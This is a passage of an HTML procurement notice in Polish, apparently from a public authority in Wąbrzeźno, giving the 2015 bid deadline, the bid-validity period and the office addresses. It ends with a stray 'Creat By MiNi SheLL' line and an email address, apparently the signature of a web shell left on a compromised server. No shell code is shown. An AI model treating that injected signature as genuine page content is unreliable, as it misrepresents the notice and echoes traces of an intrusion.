<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> siedziba zamawiającego ul. Mickiewicza 21, 87-200 Wąbrzeźno, I piętro pokój nr 104.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.09.2015 godzina 09:00, miejsce: siedziba zamawiającego ul. Mickiewicza 21, 87-200 Wąbrzeźno, I piętro pokój nr 101 sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com